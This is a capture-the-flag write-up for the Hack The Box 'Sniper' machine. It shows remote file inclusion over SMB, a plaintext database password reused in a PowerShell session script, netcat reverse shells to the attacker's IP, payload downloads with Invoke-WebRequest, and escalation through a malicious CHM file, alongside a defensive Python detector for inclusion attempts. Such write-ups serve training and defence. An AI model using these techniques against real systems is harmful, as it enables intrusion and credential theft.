Hackthebox – Sniper

As with any system, I start with a series of port scans, including a -A scan.

root@kalivm:~/Sniper# nmap -A 10.10.10.151 -oN fullscan-A
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-11 09:52 CEST
Nmap scan report for 10.10.10.151
Host is up (0.013s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-10-11T14:52:34
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   13.12 ms 10.10.12.1
2   13.23 ms 10.10.10.151 (10.10.10.151)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.65 seconds

I see that there are only few ports open, including SMB and a web server. After some analysis of the SMB server, I find nothing of immediate interest so I continue to browse through the web pages.

At one point in the blog, I see a page which accepts a parameter, so I start playing with it. Since it could be vulnerable to injection, I start with Local and Remote File Inclusion. After some trial and error I find that neither local nor remote file inclusion works over HTTP, so I continue my search to see if anything else is possible. With this research, I find this link on RFI based on SMB. So I reconfigure my SMB server to have a share called ‘sniper’ and see if I can replicate what is written in the examples.

After some trial and error, I see my nickname popping up in the source code, indicating that the RFI over SMB has worked. So now it is time to get this webshell and call it through my SMB server.
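As an added defender-side example (not code from the original post), the following Python flags requests like the one above in IIS W3C logs: a query parameter whose value is a UNC path (plain or URL-encoded), a full URL, or a traversal sequence, and notes when the referenced host is the requesting client. The log lines, the `page` parameter, the share name and the field layout are constructed for the illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed IIS W3C log sample (not from the original post); the 'page' parameter,
# the share name and the chosen log fields are assumptions for illustration only.
SAMPLE_LOG = r"""#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2019-10-11 14:50:01 10.10.10.151 GET /blog/ page=about.php 80 10.10.12.78 200
2019-10-11 14:50:22 10.10.10.151 GET /blog/ page=http://10.10.12.78/shell.txt 80 10.10.12.78 200
2019-10-11 14:51:05 10.10.10.151 GET /blog/ page=\\10.10.12.78\sniper\shell.php 80 10.10.12.78 200
2019-10-11 14:51:40 10.10.10.151 GET /blog/ page=%5c%5c10.10.12.78%5csniper%5cshell.php 80 10.10.12.78 200
2019-10-11 14:52:10 10.10.10.151 GET /blog/ page=..\..\windows\win.ini 80 10.10.12.78 200
"""

UNC_RE = re.compile(r'^(?:\\\\|//)([^\\/]+)[\\/]')      # \\host\share or //host/share
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)   # http://, ftp://, smb://, ...

def classify_value(value):
    """Return (kind, remote_host) for a suspicious parameter value, else None."""
    decoded = unquote(value)  # parse_qs already decoded once; this catches double encoding
    m = UNC_RE.match(decoded)
    if m:
        return 'unc-path', m.group(1)
    if SCHEME_RE.match(decoded):
        return 'remote-url', urlsplit(decoded).hostname
    if '..' in re.split(r'[\\/]', decoded):
        return 'traversal', None
    return None

def parse_iis_log(text):
    """Yield one dict per request line, naming columns from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith('#Fields:'):
            fields = line.split()[1:]
        elif line and not line.startswith('#') and fields:
            values = line.split(' ')
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def find_inclusion_attempts(text):
    """Flag query parameters pointing at a remote share, a URL or a traversal sequence."""
    hits = []
    for rec in parse_iis_log(text):
        for name, values in parse_qs(rec['cs-uri-query']).items():
            for verdict in filter(None, map(classify_value, values)):
                kind, host = verdict
                hits.append({'time': rec['date'] + ' ' + rec['time'], 'client': rec['c-ip'],
                             'param': name, 'kind': kind, 'host': host, 'host_is_client': host == rec['c-ip']})
    return hits
```

A UNC or URL value whose host equals the client address is the strongest signal of an attacker-hosted include; the traversal case covers the LFI attempts made before the SMB route was tried.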

The web shell allows me to browse around the file system and invoke commands as if I had an actual shell. After some browsing around in the web root of Sniper, I find a db.php file.

The db.php file contains a username and password; as they may be interesting, I note them for further use and decide that it is time to try to get a decent shell.

So first I use PowerShell to transfer netcat across.

And then I call nc.exe and get a shell on Sniper.

root@kalivm:~/Sniper# nc -nlvp 9003
Listening on 0.0.0.0 9003
Connection received on 10.10.10.151 49707
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\sedje>whoami
whoami
nt authority\iusr

C:\sedje>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Chris                    DefaultAccount           
Guest                    WDAGUtilityAccount       
The command completed with one or more errors.

So I got the shell as IUSR, the default IIS user, and there is only one other regular user on the box, called Chris. Maybe the database password is the same as the user password, so I want to try and use PowerShell to escalate my privileges. After some searching for how I can use the password with a PowerShell command, I came across a script on Stack Overflow and decided to modify it to my needs.

root@kalivm:~/Sniper# cat getshell.ps1
# Credentials found in db.php, reused for a local logon as Chris
$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
# PSCredential needs the password as a SecureString
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
# Open a PSRemoting session to localhost as Chris and drop into it
New-PSSession -Credential $credential | Enter-PSSession

Again, I use PowerShell to transfer the file and then execute it.

c:\sedje>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\sedje> Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
PS C:\sedje> ./getshell.ps1
./getshell.ps1
[localhost]: PS C:\Users\Chris\Documents> whoami
whoami
sniper\chris
[localhost]: PS C:\Users\Chris\Documents>dir c:\
dir c:\
[localhost]: PS C:\Users\Chris\Documents>

Now, as user Chris, I found out that the shell was not fully functional, so the next step is to see if I can at least get a shell back to my Kali box.

[localhost]: PS C:\Users\Chris\Documents> c:\sedje\nc.exe 10.10.12.78 9002 -e powershell
c:\sedje\nc.exe 10.10.12.78 9002 -e powershell

And in another terminal I have started a listener.

root@kalivm:~/Sniper# nc -nlvp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.151 49755
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Chris\Documents> type ../Desktop/user.txt
type ../Desktop/user.txt
21f4d0f29<NOFLAG>500c1ad716cf56e

So I get the now fully functional shell and can grab the flag!

Privilege Escalation

After some browsing through Chris' home directory and its subdirectories, I found an interesting file.

PS C:\Users\Chris> dir Downloads
dir Downloads

Directory: C:\Users\Chris\Downloads

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 8:36 AM 10462 instructions.chm

A Compiled HTML Help file; those are not too commonly used anymore as far as I know, so this could be interesting. After some further searching on the system, I also encountered something in the Docs directory in the root of the C:\ drive.

PS C:\> dir Docs
dir Docs

Directory: C:\Docs

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 9:31 AM 285 note.txt
-a---- 4/11/2019 9:17 AM 552607 php for dummies-trial.pdf

PS C:\> cd Docs
cd Docs
PS C:\Docs> type note.txt
type note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a
lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.

Regards,
Sniper CEO.

So apparently the instructions.chm file is what Chris has to prepare for the CEO and then drop into this directory. After some talking to people on Discord, I got a link to this very useful guide on how to create a malicious CHM file. One of the unfortunate things about this approach is that it requires a Windows machine, so I had to set up my VM with an evaluation version to run the HTML Help Workshop tool. Anyway, after doing so, it was a matter of starting a new project.

Simply clicking Next, Next, and Finish.

And then adding an HTML file with a malicious payload in it. After some testing and compiling I got the right payload.

Microsoft HTML Help Compiler 4.74.8702

Compiling c:\Users\sedje\sedje.chm


Compile time: 0 minutes, 0 seconds
1	Topic
0	Local links
0	Internet links
0	Graphics


Created c:\Users\sedje\sedje.chm, 10,624 bytes
Compression increased file by 10,078 bytes.

When I compiled the latest version with a working payload in HTML Help Workshop, it responded with this message stating that compiling was completed and the CHM file created. So I transfer it back to my Kali machine so that I can pick it up again with PowerShell from Sniper.

PS C:\Docs> Invoke-WebRequest "http://10.10.12.78/sedje.chm" -Outfile c:\Docs\instructions.chm
Invoke-WebRequest "http://10.10.12.78/sedje.chm" -Outfile c:\Docs\instructions.chm

From the Sniper host, I do an Invoke-WebRequest again to download the CHM file to the required directory, while having a netcat listener waiting for the shell to pop.

root@kalivm:~/Sniper# nc -nlvp 9005
Listening on 0.0.0.0 9005
Connection received on 10.10.10.151 53736   
Microsoft Windows [Version 10.0.17763.678]     
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
sniper\administrator
C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363<NOFLAG>4f6be0b7436c15

The shell pops and I get my root flag!
